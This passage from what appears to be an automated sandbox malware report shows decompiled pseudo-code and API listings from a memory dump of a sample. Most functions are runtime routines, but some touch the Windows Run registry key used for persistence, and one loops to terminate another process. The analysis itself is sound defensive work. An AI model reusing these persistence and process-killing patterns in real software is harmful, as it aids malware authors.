    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep("h N");
    				goto L2;
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep("h N");
    				}
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}

















    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}




















    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}










    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
